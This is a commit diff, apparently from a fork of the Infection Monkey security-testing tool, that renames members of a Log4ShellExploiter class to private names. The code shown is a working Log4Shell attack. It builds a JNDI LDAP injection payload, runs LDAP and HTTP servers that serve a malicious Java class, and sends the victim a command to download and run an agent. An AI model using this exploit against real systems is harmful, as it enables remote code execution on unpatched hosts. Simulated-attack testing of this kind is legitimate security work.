forked from p15670423/monkey
Agent: Prefix private methods/variables with _ in Log4ShellExploiter
This commit is contained in:
Mike Salvatore
parent
8f53a5ccd0
commit
3bbf4f9ac6
|
|
@ -38,69 +38,69 @@ class Log4ShellExploiter(WebRCE):
|
||||||
def __init__(self, host: VictimHost):
|
def __init__(self, host: VictimHost):
|
||||||
super().__init__(host)
|
super().__init__(host)
|
||||||
|
|
||||||
self.ldap_port = get_free_tcp_port()
|
self._ldap_port = get_free_tcp_port()
|
||||||
|
|
||||||
self.class_http_server_ip = get_interface_to_target(self.host.ip_addr)
|
self._class_http_server_ip = get_interface_to_target(self.host.ip_addr)
|
||||||
self.class_http_server_port = get_free_tcp_port()
|
self.class_http_server_port = get_free_tcp_port()
|
||||||
|
|
||||||
self.ldap_server = None
|
self._ldap_server = None
|
||||||
self.ldap_server_thread = None
|
self._ldap_server_thread = None
|
||||||
self.exploit_class_http_server = None
|
self._exploit_class_http_server = None
|
||||||
self.exploit_class_http_server_thread = None
|
self._exploit_class_http_server_thread = None
|
||||||
self.agent_http_server_thread = None
|
self._agent_http_server_thread = None
|
||||||
|
|
||||||
def _exploit_host(self):
|
def _exploit_host(self):
|
||||||
self.start_servers()
|
self._start_servers()
|
||||||
try:
|
try:
|
||||||
return self.exploit(None, None)
|
return self.exploit(None, None)
|
||||||
finally:
|
finally:
|
||||||
self.stop_servers()
|
self._stop_servers()
|
||||||
|
|
||||||
def start_servers(self):
|
def _start_servers(self):
|
||||||
# Start http server, to serve agent to victims
|
# Start http server, to serve agent to victims
|
||||||
paths = self.get_monkey_paths()
|
paths = self.get_monkey_paths()
|
||||||
agent_http_path = self.start_agent_http_server(paths)
|
agent_http_path = self._start_agent_http_server(paths)
|
||||||
|
|
||||||
# Build agent execution command
|
# Build agent execution command
|
||||||
command = self.build_command(paths["dest_path"], agent_http_path)
|
command = self._build_command(paths["dest_path"], agent_http_path)
|
||||||
|
|
||||||
# Start http server to serve malicious java class to victim
|
# Start http server to serve malicious java class to victim
|
||||||
self.start_class_http_server(command)
|
self._start_class_http_server(command)
|
||||||
|
|
||||||
# Start ldap server to redirect ldap query to java class server
|
# Start ldap server to redirect ldap query to java class server
|
||||||
self.start_ldap_server()
|
self._start_ldap_server()
|
||||||
|
|
||||||
def start_agent_http_server(self, agent_paths: dict) -> str:
|
def _start_agent_http_server(self, agent_paths: dict) -> str:
|
||||||
# Create server for http download and wait for it's startup.
|
# Create server for http download and wait for it's startup.
|
||||||
http_path, http_thread = HTTPTools.create_locked_transfer(
|
http_path, http_thread = HTTPTools.create_locked_transfer(
|
||||||
self.host, agent_paths["src_path"]
|
self.host, agent_paths["src_path"]
|
||||||
)
|
)
|
||||||
self.agent_http_server_thread = http_thread
|
self._agent_http_server_thread = http_thread
|
||||||
if not http_path:
|
if not http_path:
|
||||||
logger.debug("Exploiter failed, couldn't start an http server to serve agent.")
|
logger.debug("Exploiter failed, couldn't start an http server to serve agent.")
|
||||||
raise Exception("Http server creation failed")
|
raise Exception("Http server creation failed")
|
||||||
logger.info("Started http server on %s", http_path)
|
logger.info("Started http server on %s", http_path)
|
||||||
return http_path
|
return http_path
|
||||||
|
|
||||||
def start_class_http_server(self, command: str):
|
def _start_class_http_server(self, command: str):
|
||||||
java_class = self.build_java_class(command)
|
java_class = self._build_java_class(command)
|
||||||
|
|
||||||
self.exploit_class_http_server = ExploitClassHTTPServer(
|
self._exploit_class_http_server = ExploitClassHTTPServer(
|
||||||
self.class_http_server_ip, self.class_http_server_port, java_class
|
self._class_http_server_ip, self.class_http_server_port, java_class
|
||||||
)
|
)
|
||||||
# Setting `daemon=True` to save ourselves some trouble when this is merged to the
|
# Setting `daemon=True` to save ourselves some trouble when this is merged to the
|
||||||
# agent-refactor branch.
|
# agent-refactor branch.
|
||||||
# TODO: Make a call to `create_daemon_thread()` instead of calling the `Thread()`
|
# TODO: Make a call to `create_daemon_thread()` instead of calling the `Thread()`
|
||||||
# constructor directly after merging to the agent-refactor branch.
|
# constructor directly after merging to the agent-refactor branch.
|
||||||
self.exploit_class_http_server_thread = Thread(
|
self._exploit_class_http_server_thread = Thread(
|
||||||
target=self.exploit_class_http_server.run, daemon=True
|
target=self._exploit_class_http_server.run, daemon=True
|
||||||
)
|
)
|
||||||
self.exploit_class_http_server_thread.start()
|
self._exploit_class_http_server_thread.start()
|
||||||
|
|
||||||
def start_ldap_server(self):
|
def _start_ldap_server(self):
|
||||||
self.ldap_server = LDAPExploitServer(
|
self._ldap_server = LDAPExploitServer(
|
||||||
ldap_server_port=self.ldap_port,
|
ldap_server_port=self._ldap_port,
|
||||||
http_server_ip=self.class_http_server_ip,
|
http_server_ip=self._class_http_server_ip,
|
||||||
http_server_port=self.class_http_server_port,
|
http_server_port=self.class_http_server_port,
|
||||||
storage_dir=get_monkey_dir_path(),
|
storage_dir=get_monkey_dir_path(),
|
||||||
)
|
)
|
||||||
|
|
@ -109,26 +109,26 @@ class Log4ShellExploiter(WebRCE):
|
||||||
# agent-refactor branch.
|
# agent-refactor branch.
|
||||||
# TODO: Make a call to `create_daemon_thread()` instead of calling the `Thread()`
|
# TODO: Make a call to `create_daemon_thread()` instead of calling the `Thread()`
|
||||||
# constructor directly after merging to the agent-refactor branch.
|
# constructor directly after merging to the agent-refactor branch.
|
||||||
self.ldap_server_thread = Thread(target=self.ldap_server.run, daemon=True)
|
self._ldap_server_thread = Thread(target=self._ldap_server.run, daemon=True)
|
||||||
self.ldap_server_thread.start()
|
self._ldap_server_thread.start()
|
||||||
|
|
||||||
def stop_servers(self):
|
def _stop_servers(self):
|
||||||
logger.debug("Stopping all LDAP and HTTP Servers")
|
logger.debug("Stopping all LDAP and HTTP Servers")
|
||||||
self.agent_http_server_thread.stop()
|
self._agent_http_server_thread.stop()
|
||||||
self.agent_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
self._agent_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
||||||
|
|
||||||
self.exploit_class_http_server.stop()
|
self._exploit_class_http_server.stop()
|
||||||
self.exploit_class_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
self._exploit_class_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
||||||
|
|
||||||
self.ldap_server.stop()
|
self._ldap_server.stop()
|
||||||
self.ldap_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
self._ldap_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
||||||
|
|
||||||
def build_ldap_payload(self):
|
def _build_ldap_payload(self):
|
||||||
interface_ip = get_interface_to_target(self.host.ip_addr)
|
interface_ip = get_interface_to_target(self.host.ip_addr)
|
||||||
return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
|
return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}"
|
||||||
|
|
||||||
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
|
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
|
||||||
def build_command(self, path, http_path):
|
def _build_command(self, path, http_path):
|
||||||
# Build command to execute
|
# Build command to execute
|
||||||
monkey_cmd = build_monkey_commandline(
|
monkey_cmd = build_monkey_commandline(
|
||||||
self.host, get_monkey_depth() - 1, vulnerable_port=None
|
self.host, get_monkey_depth() - 1, vulnerable_port=None
|
||||||
|
|
@ -145,7 +145,7 @@ class Log4ShellExploiter(WebRCE):
|
||||||
"parameters": monkey_cmd,
|
"parameters": monkey_cmd,
|
||||||
}
|
}
|
||||||
|
|
||||||
def build_java_class(self, exploit_command: str) -> bytes:
|
def _build_java_class(self, exploit_command: str) -> bytes:
|
||||||
if "linux" in self.host.os["type"]:
|
if "linux" in self.host.os["type"]:
|
||||||
return build_exploit_bytecode(exploit_command, LINUX_EXPLOIT_TEMPLATE_PATH)
|
return build_exploit_bytecode(exploit_command, LINUX_EXPLOIT_TEMPLATE_PATH)
|
||||||
else:
|
else:
|
||||||
|
|
@ -159,12 +159,12 @@ class Log4ShellExploiter(WebRCE):
|
||||||
]
|
]
|
||||||
for exploit in get_log4shell_service_exploiters():
|
for exploit in get_log4shell_service_exploiters():
|
||||||
for port in open_ports:
|
for port in open_ports:
|
||||||
exploit.trigger_exploit(self.build_ldap_payload(), self.host, port)
|
exploit.trigger_exploit(self._build_ldap_payload(), self.host, port)
|
||||||
|
|
||||||
# Wait for request
|
# Wait for request
|
||||||
sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)
|
sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)
|
||||||
|
|
||||||
if self.exploit_class_http_server.exploit_class_downloaded():
|
if self._exploit_class_http_server.exploit_class_downloaded():
|
||||||
self.exploit_info["vulnerable_service"] = {
|
self.exploit_info["vulnerable_service"] = {
|
||||||
"service_name": exploit.service_name,
|
"service_name": exploit.service_name,
|
||||||
"port": port,
|
"port": port,
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue